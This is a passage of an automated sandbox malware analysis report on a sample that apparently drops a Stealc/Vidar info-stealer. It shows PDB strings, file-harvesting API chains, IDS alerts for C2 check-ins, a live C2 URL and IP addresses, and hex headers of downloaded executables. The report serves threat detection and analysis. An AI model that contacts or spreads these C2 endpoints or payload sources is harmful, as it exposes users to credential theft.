Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: mozglue.pdb source: u5ek.0.exe, 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000000.1783099524.000000000031C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000002.1863586625.000000000031C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000014.00000002.2259125869.000000000031C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2913830974.000002721BAF0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920246621.000002727C780000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1867767738.000000006C8A7000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 00000014.00000002.2293392231.000000006CCC7000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920787436.000002727C8D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920330280.000002727C790000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: wxfSIz4PAi.exe, 00000000.00000002.1986225613.000000000412E000.00000004.00000020.00020000.00000000.sdmp, wxfSIz4PAi.exe, 00000000.00000000.1609516456.0000000000413000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: EGIJKEHCAK.exe, 00000013.00000000.2121163542.000000000071C000.00000002.00000001.01000000.00000014.sdmp, EGIJKEHCAK.exe, 00000013.00000002.2868926481.000000000071C000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920667291.000002727C8C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920330280.000002727C790000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920667291.000002727C8C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1866972606.0000000003900000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1867218514.0000000003DB7000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1866008850.00000000027BD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163183799.0000000005416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163536288.00000000058F0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292633080.000000000471F000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292037261.0000000004260000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721001C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2913908071.000002721BB00000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: wxfSIz4PAi.exe, 00000000.00000002.1986225613.000000000412E000.00000004.00000020.00020000.00000000.sdmp, wxfSIz4PAi.exe, 00000000.00000000.1609516456.0000000000413000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\gegedirijeduho_lozome.pdb source: wxfSIz4PAi.exe, 00000000.00000003.1663398442.0000000005D81000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000000.1661539238.0000000000413000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: nss3.pdb source: u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004121F0

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File opened: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File opened: C:\Users\user\AppData\Local\Temp\u5ek.2	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.4:49730 -> 185.172.128.90:80
Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.76:80 -> 192.168.2.4:49733
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.76:80 -> 192.168.2.4:49733

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.172.128.76/3cd2b41cbde8fc9c.php

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.215.85.66 ports 1,4,5,6,7,15647

Yara detected Generic Downloader

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cb30000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101749f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101eeb15.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.4:49759 -> 91.215.85.66:15647

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 21:08:55 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 26 Apr 2024 21:00:01 GMTETag: "4c400-617062ff083e7"Accept-Ranges: bytesContent-Length: 312320Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f 14 d4 08 4b 75 ba 5b 4b 75 ba 5b 4b 75 ba 5b 46 27 65 5b 55 75 ba 5b 46 27 5a 5b c3 75 ba 5b 46 27 5b 5b 64 75 ba 5b 42 0d 29 5b 48 75 ba 5b 4b 75 bb 5b 3b 75 ba 5b fe eb 5f 5b 4a 75 ba 5b 46 27 61 5b 4a 75 ba 5b fe eb 64 5b 4a 75 ba 5b 52 69 63 68 4b 75 ba 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 26 85 3e 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 1a 01 00 00 82 c2 03 00 00 00 00 e7 40 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 c3 03 00 04 00 00 5d 0c 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 94 01 00 28 00 00 00 00 40 c2 03 e8 69 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c3 03 4c 14 00 00 00 32 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 89 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a3 18 01 00 00 10 00 00 00 1a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a4 6d 00 00 00 30 01 00 00 6e 00 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 92 c0 03 00 a0 01 00 00 b8 01 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 69 01 00 00 40 c2 03 00 6a 01 00 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 4c 14 00 00 00 b0 c3 03 00 16 00 00 00 ae 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 21:09:01 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 